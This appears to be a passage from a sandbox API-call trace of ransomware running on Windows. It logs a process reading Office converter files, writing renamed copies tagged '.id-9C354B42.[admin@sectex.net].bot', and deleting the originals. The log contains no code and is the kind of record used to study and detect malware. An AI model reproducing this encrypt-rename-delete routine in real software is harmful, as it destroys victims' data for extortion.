	[0158.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.639] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.639] lstrlenW (lpString=".doc") returned 4
	[0158.639] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0158.639] lstrlenW (lpString=".docx") returned 5
	[0158.639] lstrcmpiW (lpString1=".docx", lpString2="R.SAM") returned -1
	[0158.639] lstrlenW (lpString=".pdf") returned 4
	[0158.639] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0158.639] lstrlenW (lpString=".xls") returned 4
	[0158.639] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0158.639] lstrlenW (lpString=".xlsx") returned 5
	[0158.639] lstrcmpiW (lpString1=".xlsx", lpString2="R.SAM") returned -1
	[0158.639] lstrlenW (lpString=".ppt") returned 4
	[0158.640] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0158.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.640] lstrlenW (lpString=".zip") returned 4
	[0158.640] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0158.640] lstrlenW (lpString=".rar") returned 4
	[0158.640] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0158.640] lstrlenW (lpString=".bz2") returned 4
	[0158.640] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0158.640] lstrlenW (lpString=".7z") returned 3
	[0158.640] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0158.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.640] lstrlenW (lpString=".dbf") returned 4
	[0158.640] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0158.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.640] lstrlenW (lpString=".1cd") returned 4
	[0158.640] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0158.640] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\1033\\PABR.SAM") returned 64
	[0158.640] lstrlenW (lpString=".jpg") returned 4
	[0158.640] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0158.640] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0158.640] lstrlenW (lpString="DELIMWIN.FAE") returned 12
	[0158.640] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimwin.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0158.669] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=31136) returned 1
	[0158.669] CloseHandle (hObject=0x3c4) returned 1
	[0158.669] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimwin.fae")) returned 0x20
	[0158.700] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimwin.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0158.937] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimwin.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c4
	[0158.954] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.954] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0158.954] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimwin.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c
	[0158.955] GetLastError () returned 0x0
	[0158.955] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x79a0, lpOverlapped=0x0) returned 1
	[0159.053] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0x79b0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0x79b0, lpOverlapped=0x0) returned 1
	[0159.054] ReadFile (in: hFile=0x3c4, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.054] WriteFile (in: hFile=0x37c, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xec, lpOverlapped=0x0) returned 1
	[0159.054] SetEndOfFile (hFile=0x37c) returned 1
	[0159.054] CloseHandle (hObject=0x37c) returned 1
	[0159.054] SetFilePointerEx (in: hFile=0x3c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.054] SetEndOfFile (hFile=0x3c4) returned 1
	[0159.057] CloseHandle (hObject=0x3c4) returned 1
	[0159.057] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.071] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\delimwin.fae")) returned 1
	[0159.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.106] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.106] lstrlenW (lpString=".doc") returned 4
	[0159.106] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.118] lstrlenW (lpString=".docx") returned 5
	[0159.118] lstrcmpiW (lpString1=".docx", lpString2="N.FAE") returned -1
	[0159.118] lstrlenW (lpString=".pdf") returned 4
	[0159.118] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.118] lstrlenW (lpString=".xls") returned 4
	[0159.118] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.118] lstrlenW (lpString=".xlsx") returned 5
	[0159.118] lstrcmpiW (lpString1=".xlsx", lpString2="N.FAE") returned -1
	[0159.118] lstrlenW (lpString=".ppt") returned 4
	[0159.118] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.118] lstrlenW (lpString=".zip") returned 4
	[0159.118] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.118] lstrlenW (lpString=".rar") returned 4
	[0159.118] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.118] lstrlenW (lpString=".bz2") returned 4
	[0159.118] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.118] lstrlenW (lpString=".7z") returned 3
	[0159.118] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.118] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.119] lstrlenW (lpString=".dbf") returned 4
	[0159.119] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.119] lstrlenW (lpString=".1cd") returned 4
	[0159.119] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.119] lstrlenW (lpString=".jpg") returned 4
	[0159.119] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.119] lstrlenW (lpString=".doc") returned 4
	[0159.119] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.119] lstrlenW (lpString=".docx") returned 5
	[0159.119] lstrcmpiW (lpString1=".docx", lpString2="N.FAE") returned -1
	[0159.119] lstrlenW (lpString=".pdf") returned 4
	[0159.119] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.119] lstrlenW (lpString=".xls") returned 4
	[0159.119] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.119] lstrlenW (lpString=".xlsx") returned 5
	[0159.119] lstrcmpiW (lpString1=".xlsx", lpString2="N.FAE") returned -1
	[0159.119] lstrlenW (lpString=".ppt") returned 4
	[0159.119] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.119] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.119] lstrlenW (lpString=".zip") returned 4
	[0159.119] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.119] lstrlenW (lpString=".rar") returned 4
	[0159.119] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.119] lstrlenW (lpString=".bz2") returned 4
	[0159.119] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.119] lstrlenW (lpString=".7z") returned 3
	[0159.120] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.120] lstrlenW (lpString=".dbf") returned 4
	[0159.120] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.120] lstrlenW (lpString=".1cd") returned 4
	[0159.120] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.120] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\DELIMWIN.FAE") returned 63
	[0159.120] lstrlenW (lpString=".jpg") returned 4
	[0159.120] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.120] lstrcmpiW (lpString1=".FAE", lpString2=".bot") returned 1
	[0159.120] lstrlenW (lpString="OLNOTE.FAE") returned 10
	[0159.120] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olnote.fae"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.135] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=52120) returned 1
	[0159.135] CloseHandle (hObject=0x3f0) returned 1
	[0159.135] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olnote.fae")) returned 0x20
	[0159.135] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olnote.fae.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.136] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olnote.fae"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.136] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.136] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olnote.fae.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0159.152] GetLastError () returned 0x0
	[0159.152] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xcb98, lpOverlapped=0x0) returned 1
	[0159.173] WriteFile (in: hFile=0x3c0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xcba0, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xcba0, lpOverlapped=0x0) returned 1
	[0159.175] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.175] WriteFile (in: hFile=0x3c0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe8, lpOverlapped=0x0) returned 1
	[0159.175] SetEndOfFile (hFile=0x3c0) returned 1
	[0159.175] CloseHandle (hObject=0x3c0) returned 1
	[0159.175] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.175] SetEndOfFile (hFile=0x3f0) returned 1
	[0159.178] CloseHandle (hObject=0x3f0) returned 1
	[0159.178] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.178] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\olnote.fae")) returned 1
	[0159.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.179] lstrlenW (lpString=".doc") returned 4
	[0159.179] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.179] lstrlenW (lpString=".docx") returned 5
	[0159.179] lstrcmpiW (lpString1=".docx", lpString2="E.FAE") returned -1
	[0159.179] lstrlenW (lpString=".pdf") returned 4
	[0159.179] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.179] lstrlenW (lpString=".xls") returned 4
	[0159.179] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.179] lstrlenW (lpString=".xlsx") returned 5
	[0159.179] lstrcmpiW (lpString1=".xlsx", lpString2="E.FAE") returned -1
	[0159.179] lstrlenW (lpString=".ppt") returned 4
	[0159.179] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.179] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.179] lstrlenW (lpString=".zip") returned 4
	[0159.179] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.179] lstrlenW (lpString=".rar") returned 4
	[0159.179] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.179] lstrlenW (lpString=".bz2") returned 4
	[0159.179] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.179] lstrlenW (lpString=".7z") returned 3
	[0159.180] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.180] lstrlenW (lpString=".dbf") returned 4
	[0159.180] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.180] lstrlenW (lpString=".1cd") returned 4
	[0159.180] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.180] lstrlenW (lpString=".jpg") returned 4
	[0159.180] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.180] lstrlenW (lpString=".doc") returned 4
	[0159.180] lstrcmpiW (lpString1=".doc", lpString2=".FAE") returned -1
	[0159.180] lstrlenW (lpString=".docx") returned 5
	[0159.180] lstrcmpiW (lpString1=".docx", lpString2="E.FAE") returned -1
	[0159.180] lstrlenW (lpString=".pdf") returned 4
	[0159.180] lstrcmpiW (lpString1=".pdf", lpString2=".FAE") returned 1
	[0159.180] lstrlenW (lpString=".xls") returned 4
	[0159.180] lstrcmpiW (lpString1=".xls", lpString2=".FAE") returned 1
	[0159.180] lstrlenW (lpString=".xlsx") returned 5
	[0159.180] lstrcmpiW (lpString1=".xlsx", lpString2="E.FAE") returned -1
	[0159.180] lstrlenW (lpString=".ppt") returned 4
	[0159.180] lstrcmpiW (lpString1=".ppt", lpString2=".FAE") returned 1
	[0159.180] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.180] lstrlenW (lpString=".zip") returned 4
	[0159.180] lstrcmpiW (lpString1=".zip", lpString2=".FAE") returned 1
	[0159.180] lstrlenW (lpString=".rar") returned 4
	[0159.180] lstrcmpiW (lpString1=".rar", lpString2=".FAE") returned 1
	[0159.181] lstrlenW (lpString=".bz2") returned 4
	[0159.181] lstrcmpiW (lpString1=".bz2", lpString2=".FAE") returned -1
	[0159.181] lstrlenW (lpString=".7z") returned 3
	[0159.181] lstrcmpiW (lpString1=".7z", lpString2="FAE") returned -1
	[0159.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.181] lstrlenW (lpString=".dbf") returned 4
	[0159.181] lstrcmpiW (lpString1=".dbf", lpString2=".FAE") returned -1
	[0159.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.181] lstrlenW (lpString=".1cd") returned 4
	[0159.181] lstrcmpiW (lpString1=".1cd", lpString2=".FAE") returned -1
	[0159.181] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\OLNOTE.FAE") returned 61
	[0159.181] lstrlenW (lpString=".jpg") returned 4
	[0159.181] lstrcmpiW (lpString1=".jpg", lpString2=".FAE") returned 1
	[0159.181] lstrcmpiW (lpString1=".SAM", lpString2=".bot") returned 1
	[0159.181] lstrlenW (lpString="PAB.SAM") returned 7
	[0159.181] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\pab.sam"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.185] GetFileSizeEx (in: hFile=0x3f0, lpFileSize=0xa9cff1c | out: lpFileSize=0xa9cff1c*=63864) returned 1
	[0159.185] CloseHandle (hObject=0x3f0) returned 1
	[0159.185] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\pab.sam")) returned 0x20
	[0159.185] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\pab.sam.id-9c354b42.[admin@sectex.net].bot")) returned 0xffffffff
	[0159.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\pab.sam"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3f0
	[0159.186] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.186] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.186] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM.id-9C354B42.[admin@sectex.net].bot" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\pab.sam.id-9c354b42.[admin@sectex.net].bot"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3c0
	[0159.187] GetLastError () returned 0x0
	[0159.187] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0xf978, lpOverlapped=0x0) returned 1
	[0159.192] WriteFile (in: hFile=0x3c0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xf980, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xf980, lpOverlapped=0x0) returned 1
	[0159.194] ReadFile (in: hFile=0x3f0, lpBuffer=0xb290020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0xa9cfed4, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesRead=0xa9cfed4*=0x0, lpOverlapped=0x0) returned 1
	[0159.194] WriteFile (in: hFile=0x3c0, lpBuffer=0xb290020*, nNumberOfBytesToWrite=0xe2, lpNumberOfBytesWritten=0xa9cfc9c, lpOverlapped=0x0 | out: lpBuffer=0xb290020*, lpNumberOfBytesWritten=0xa9cfc9c*=0xe2, lpOverlapped=0x0) returned 1
	[0159.194] SetEndOfFile (hFile=0x3c0) returned 1
	[0159.194] CloseHandle (hObject=0x3c0) returned 1
	[0159.195] SetFilePointerEx (in: hFile=0x3f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0xa9cfec8 | out: lpNewFilePointer=0x0) returned 1
	[0159.195] SetEndOfFile (hFile=0x3f0) returned 1
	[0159.197] CloseHandle (hObject=0x3f0) returned 1
	[0159.197] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM.id-9C354B42.[admin@sectex.net].bot", dwFileAttributes=0x20) returned 1
	[0159.198] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM" (normalized: "c:\\program files\\microsoft office\\office14\\convert\\pab.sam")) returned 1
	[0159.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.198] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.198] lstrlenW (lpString=".doc") returned 4
	[0159.198] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0159.198] lstrlenW (lpString=".docx") returned 5
	[0159.198] lstrcmpiW (lpString1=".docx", lpString2="B.SAM") returned -1
	[0159.198] lstrlenW (lpString=".pdf") returned 4
	[0159.199] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0159.199] lstrlenW (lpString=".xls") returned 4
	[0159.199] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
	[0159.199] lstrlenW (lpString=".xlsx") returned 5
	[0159.199] lstrcmpiW (lpString1=".xlsx", lpString2="B.SAM") returned -1
	[0159.199] lstrlenW (lpString=".ppt") returned 4
	[0159.199] lstrcmpiW (lpString1=".ppt", lpString2=".SAM") returned -1
	[0159.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.199] lstrlenW (lpString=".zip") returned 4
	[0159.199] lstrcmpiW (lpString1=".zip", lpString2=".SAM") returned 1
	[0159.199] lstrlenW (lpString=".rar") returned 4
	[0159.199] lstrcmpiW (lpString1=".rar", lpString2=".SAM") returned -1
	[0159.199] lstrlenW (lpString=".bz2") returned 4
	[0159.199] lstrcmpiW (lpString1=".bz2", lpString2=".SAM") returned -1
	[0159.199] lstrlenW (lpString=".7z") returned 3
	[0159.199] lstrcmpiW (lpString1=".7z", lpString2="SAM") returned -1
	[0159.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.199] lstrlenW (lpString=".dbf") returned 4
	[0159.199] lstrcmpiW (lpString1=".dbf", lpString2=".SAM") returned -1
	[0159.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.199] lstrlenW (lpString=".1cd") returned 4
	[0159.199] lstrcmpiW (lpString1=".1cd", lpString2=".SAM") returned -1
	[0159.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.199] lstrlenW (lpString=".jpg") returned 4
	[0159.199] lstrcmpiW (lpString1=".jpg", lpString2=".SAM") returned -1
	[0159.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.199] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\CONVERT\\PAB.SAM") returned 58
	[0159.199] lstrlenW (lpString=".doc") returned 4
	[0159.199] lstrcmpiW (lpString1=".doc", lpString2=".SAM") returned -1
	[0159.200] lstrlenW (lpString=".docx") returned 5
	[0159.200] lstrcmpiW (lpString1=".docx", lpString2="B.SAM") returned -1
	[0159.200] lstrlenW (lpString=".pdf") returned 4
	[0159.200] lstrcmpiW (lpString1=".pdf", lpString2=".SAM") returned -1
	[0159.200] lstrlenW (lpString=".xls") returned 4
	[0159.200] lstrcmpiW (lpString1=".xls", lpString2=".SAM") returned 1
